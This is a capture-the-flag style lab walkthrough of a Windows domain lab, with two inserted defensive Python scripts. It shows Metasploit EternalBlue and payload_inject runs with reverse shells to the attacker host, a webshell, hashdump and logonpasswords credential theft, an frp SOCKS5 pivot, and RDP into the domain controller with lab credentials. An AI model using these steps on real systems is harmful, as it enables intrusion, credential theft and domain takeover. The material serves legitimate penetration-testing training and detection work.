Topology diagram
Environment setup
WEB.de1ay.com
The de1ay account cannot log in with the default password. Log in locally as webadministrator (empty password) and reset the de1ay account's password back to the default (1qaz@WSX).
Activate Windows with HEU_KMS (choose "reset Windows").
netsh advfirewall show currentprofile to check the firewall state -> enabled
Start WebLogic (default port 7001):
C:\Oracle\Middleware\user_projects\domains\base_domain\startWebLogic
netstat -an | findstr 7001 confirms it is listening normally.
DC
Default password (1qaz@WSX)
netsh advfirewall show currentprofile to check the firewall state -> enabled
This host is both the domain controller and the DNS server.
PC
Default password (1qaz@WSX)
netsh advfirewall show currentprofile to check the firewall state -> enabled
External reconnaissance
nmap -v -T4 -p- -A -oN ATT_02.log 192.168.30.131
#-A: comprehensive scan (OS detection, version detection, scripts, traceroute)
#-p-: all ports
#-T4: timing template (relatively fast)
#-v: verbose output
#-oN ATT_02.log: save the results in normal format
Scan results
3389 - Remote Desktop Services (RDP)
445 - file sharing (SMB)
1433 - Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
7001 - WebLogic
OS: Windows Server 2008 R2 Standard
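The exposure picture above comes from reading the nmap -oN report by hand. As an added example, not part of the original write-up, the following Python parses that report format into a service inventory and annotates the listeners the write-up singles out with the mitigation a defender would want. The sample report text is constructed to match the shape of the scan (banners abbreviated), and the RISK_NOTES table is the editor's, not the page's.

```python
import re

# Constructed sample: an nmap "normal output" (-oN) report in the shape the
# write-up's scan produced. Banners are abbreviated and are not the lab's real output.
SAMPLE_NMAP_OUTPUT = """\
# Nmap 7.94 scan initiated Sat Jan  1 10:00:00 2024 as: nmap -v -T4 -p- -A -oN ATT_02.log 192.168.30.131
Nmap scan report for 192.168.30.131
Host is up (0.00050s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE            VERSION
445/tcp  open  microsoft-ds       Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp open  ms-sql-s           Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
3389/tcp open  ssl/ms-wbt-server?
7001/tcp open  http               Oracle WebLogic Server (Servlet 2.5; JSP 2.1; T3 enabled)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
# Nmap done at Sat Jan  1 10:05:00 2024 -- 1 IP address (1 host up) scanned in 300.00 seconds
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version banner>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Defender-side notes for the four listeners the write-up attacks (editor's table).
RISK_NOTES = {
    445:  ("SMB", "apply MS17-010; restrict 445 to management networks"),
    1433: ("MSSQL", "no direct exposure; strong sa password; keep xp_cmdshell disabled"),
    3389: ("RDP", "require NLA and MFA; reach only via VPN or jump host"),
    7001: ("WebLogic", "patch CVE-2017-3506/2019-2725/2019-2729; restrict /console and T3"),
}


def parse_nmap_normal(text):
    """Return [(port, proto, state, service, version)] from nmap -oN text."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:  # headers, host lines and comments do not match the port pattern
            continue
        port, proto, state, service, version = m.groups()
        services.append((int(port), proto, state, service, (version or "").strip()))
    return services


def exposure_review(services):
    """Annotate open listeners; ports outside RISK_NOTES are flagged for review."""
    findings = []
    for port, proto, state, service, version in services:
        if state != "open":
            continue
        name, action = RISK_NOTES.get(port, (service, "confirm this listener is required"))
        findings.append({"port": port, "service": name, "version": version, "action": action})
    return findings


if __name__ == "__main__":
    for f in exposure_review(parse_nmap_normal(SAMPLE_NMAP_OUTPUT)):
        print(f"{f['port']:>5}  {f['service']:<9} {f['action']}")
```

Feeding the real ATT_02.log to parse_nmap_normal gives the same inventory the write-up lists by hand; the review step is where a blue team would record which of these listeners is actually needed on an externally reachable host.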
Attack approach
3389: brute force, exploitation of RDP vulnerabilities
445: EternalBlue
7001: Java framework vulnerabilities
1433: searchsploit
searchsploit
-t search in titles
-m mirror (copy) the exploit to...
-w show the exploit's URL instead of the local path
Mirror the script locally
3389
The check module confirms the flaw; the DoS module only blue-screens the target and cannot yield a shell, so it is not used for the attack.
msf6 > search ms12-020

Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/ms12_020_check              .                normal  Yes    MS12-020 Microsoft Remote Desktop Checker
   1  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf6 > use 0
msf6 auxiliary(scanner/rdp/ms12_020_check) > options

Module options (auxiliary/scanner/rdp/ms12_020_check):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    3389             yes       Remote port running RDP (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)

View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.30.131
rhosts => 192.168.30.131
msf6 auxiliary(scanner/rdp/ms12_020_check) > run

[+] 192.168.30.131:3389 - 192.168.30.131:3389 - The target is vulnerable.
[*] 192.168.30.131:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/rdp/ms12_020_check) >
445
msf6 > search ms17-010

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .
   10  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   11    \_ target: Automatic                         .                .        .      .
   12    \_ target: PowerShell                        .                .        .      .
   13    \_ target: Native upload                     .                .        .      .
   14    \_ target: MOF upload                        .                .        .      .
   15    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   16    \_ AKA: ETERNALROMANCE                       .                .        .      .
   17    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   18    \_ AKA: ETERNALBLUE                          .                .        .      .
   19  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   20    \_ AKA: ETERNALSYNERGY                       .                .        .      .
   21    \_ AKA: ETERNALROMANCE                       .                .        .      .
   22    \_ AKA: ETERNALCHAMPION                      .                .        .      .
   23    \_ AKA: ETERNALBLUE                          .                .        .      .
   24  auxiliary/scanner/smb/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection
   25    \_ AKA: DOUBLEPULSAR                         .                .        .      .
   26    \_ AKA: ETERNALBLUE                          .                .        .      .
   27  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
   28    \_ target: Execute payload (x64)             .                .        .      .
   29    \_ target: Neutralize implant                .                .        .      .

Interact with a module by name or index. For example info 29, use 29 or use exploit/windows/smb/smb_doublepulsar_rce
After interacting with a module you can manually set a TARGET with set TARGET 'Neutralize implant'

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.30.128   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tc
[-] The value specified for payload is not valid.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.30.131
rhosts => 192.168.30.131
msf6 exploit(windows/smb/ms17_010_eternalblue) >
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.30.128:4444
[*] 192.168.30.131:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.30.131:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.30.131:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.30.131:445 - The target is vulnerable.
[*] 192.168.30.131:445 - Connecting to target for exploitation.
[+] 192.168.30.131:445 - Connection established for exploitation.
[+] 192.168.30.131:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.30.131:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.30.131:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.30.131:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 192.168.30.131:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.30.131:445 - 0x00000030  6b 20 31                                         k 1
[+] 192.168.30.131:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.30.131:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.30.131:445 - Sending all but last fragment of exploit packet
[-] 192.168.30.131:445 - Errno::ECONNRESET: Connection reset by peer
[*] Exploit completed, but no session was created.
Blocked by 360 (the endpoint antivirus resets the connection)
You can turn 360 off and run again.
chcp 65001 fixes the garbled character encoding in the shell.
exit leaves the session.
background: puts the current session in the background
sessions: lists sessions with their IDs
sessions -i <id> # interact with a session
sessions -k <id> # kill a session
Exploitation
7001
Automated tools
Connect with Godzilla (the webshell manager) to get a shell and gather information; the privileges obtained are fairly low.
WebLogic vulnerability detection script
[*] =========Task Start=========
[+] [192.168.30.131:7001] Weblogic Version Is 10.3.6.0
[+] [192.168.30.131:7001] Weblogic console address is exposed! The path is: http://192.168.30.131:7001/console/login/LoginForm.jsp
[+] [192.168.30.131:7001] Weblogic UDDI module is exposed! The path is: http://192.168.30.131:7001/uddiexplorer/
[+] [192.168.30.131:7001] weblogic has a JAVA deserialization vulnerability:CVE-2017-3506
[+] [192.168.30.131:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
[+] [192.168.30.131:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2729
CVE-2019-2725
Unsuccessful.
The scan shows the WebLogic version is 10.3.6.0.
Try the Kali tools one by one.
It turns out that few of them work; searchsploit -w weblogic 10.3.6.0
Open the site and filter for usable entries; only 44553 works. That exploitation method was already covered in another article and is not reproduced here.
Getting an MSF session
Continue from the Godzilla connection; fill in the details as Godzilla prompts, click Go, and the session comes up in MSF.
Privilege escalation
migrate 492 migrates into a process running as SYSTEM.
Getting a CS (Cobalt Strike) beacon
Create a new listener.
The team server (the attacker machine, your Kali) then opens port 8088.
Pass the MSF session to CS:
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows WEBde1ay @ WEB 192.168.30.128:9999 -> 192.168.30.131:63910 (192.168.30.131)
msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.30.128
lhost => 192.168.30.128
msf6 exploit(windows/local/payload_inject) > set lport 8088
lport => 8088
msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf6 exploit(windows/local/payload_inject) > set PrependMigrate true
PrependMigrate => true
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1
msf6 exploit(windows/local/payload_inject) > run
[*] Running module against WEB
[*] Spawned Notepad process 5080
[*] Injecting payload into 5080
[*] Preparing 'windows/meterpreter/reverse_http' for PID 5080
msf6 exploit(windows/local/payload_inject) >
The beacon checks in successfully.
Adjust the sleep time.
Internal network information gathering
To run system commands in the beacon, prefix them with shell.
Dump password hashes: hashdump
Grab plaintext passwords: logonpasswords
List other domain users: shell net user /domain
List domain admins: shell net group "domain admins" /domain
List domain computers: shell net group "domain computers" /domain
List domain controllers: shell net group "domain controllers" /domain
Locate the DC: shell ping DC
Internal scan: portscan 10.10.10.0/24 1-1024,3389,5000-6000 arp 1024
Domain controller:
DC 10.10.10.10
Two hosts:
PC 10.10.10.201
WEB 10.10.10.128
Domain administrator: Administrator
Other users: de1ay Guest krbtgt mssql
frp deployment
frpc goes on the machine inside the internal network.
frps goes on the machine with the public IP.
frps:
[common]
bind_addr = 0.0.0.0 # server listen IP
bind_port = 7000 # server listen port
[socks5]
type = tcp
remote_port = 1080 # socks5 proxy server port
plugin = socks5 # socks5 proxy plugin
frpc:
[common]
server_addr = 192.168.30.128 # attacker-side IP
server_port = 7000 # attacker-side listening port
[socks5]
type = tcp
remote_port = 1080 # socks5 proxy port
plugin = socks5 # use the socks5 proxy plugin
Upload the two files, frpc.ini and frpc.exe, through CS.
Start frpc from a remote desktop connection from Kali.
Kali now also has port 1080 listening.
Kali has no interface on the 10.x segment, yet pinging the DC at 10.10.10.10 now succeeds.
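The frpc.ini above is exactly the artifact a defender wants to find on a compromised host: a client configuration that pivots into the internal network through a SOCKS5 plugin. As an added example, not part of the original write-up, the following Python audits an frpc.ini body with the standard configparser, strips the inline "#" comments that frp users write after values (a naive parse would fold them into the value), and reports a server address outside an allow-list or any proxy section that loads a tunnelling plugin. The APPROVED_SERVERS allow-list and the benign config are constructed for the example.

```python
import configparser

# Constructed: the frpc.ini shape from the write-up (SOCKS5 plugin exposed on
# the frps side on port 1080), with inline comments kept deliberately.
FRPC_SAMPLE = """\
[common]
server_addr = 192.168.30.128 # attacker-side IP
server_port = 7000 # attacker-side listening port
[socks5]
type = tcp
remote_port = 1080 # socks5 proxy port
plugin = socks5 # use the socks5 proxy plugin
"""

# Constructed benign config: a plain port forward to an approved frps host.
FRPC_BENIGN = """\
[common]
server_addr = 10.0.0.5
server_port = 7000
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
"""

APPROVED_SERVERS = {"10.0.0.5"}            # hypothetical allow-list of frps hosts
TUNNEL_PLUGINS = {"socks5", "http_proxy"}  # plugins that turn frpc into an egress proxy


def parse_frp_ini(text):
    """Parse frp's INI dialect; inline '#'/';' comments after values are dropped."""
    cp = configparser.ConfigParser(inline_comment_prefixes=("#", ";"), interpolation=None)
    cp.read_string(text)
    return cp


def audit_frpc(text):
    """Return a list of finding strings for an frpc.ini body (empty if clean)."""
    cp = parse_frp_ini(text)
    findings = []
    server = cp.get("common", "server_addr", fallback="")
    if server not in APPROVED_SERVERS:
        findings.append(f"frps server {server!r} is not on the approved list")
    for section in cp.sections():
        if section == "common":
            continue
        plugin = cp.get(section, "plugin", fallback="")
        if plugin in TUNNEL_PLUGINS:
            port = cp.get(section, "remote_port", fallback="?")
            findings.append(f"proxy section [{section}] exposes plugin {plugin} on remote port {port}")
    return findings


if __name__ == "__main__":
    for name, body in (("sample", FRPC_SAMPLE), ("benign", FRPC_BENIGN)):
        print(name, audit_frpc(body) or "clean")
```

Pointing audit_frpc at frpc.ini files found by an endpoint sweep turns the write-up's pivot into a host-based detection; the outbound connection to server_addr:server_port is the matching network indicator.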
proxychains deployment
vim /etc/proxychains4.conf
At the end of the file, comment out the socks4 line and add socks5 127.0.0.1 1080.
Without the proxy we cannot reach the DC at all.
Through proxychains4 the RDP login goes through, but no login screen appears.
Looking it up afterwards: rdesktop does not support Network Level Authentication (NLA).
Connecting with xfreerdp instead works normally:
proxychains4 xfreerdp /u:administrator /d:de1ay /p:1qaz@WSX /sec:rdp /v:10.10.10.10 /cert-ignore
Global proxy: proxychains4 bash
End
Originally published on the WeChat official account (flowers-boy): ATT&CK Red Team Evaluation Lab 2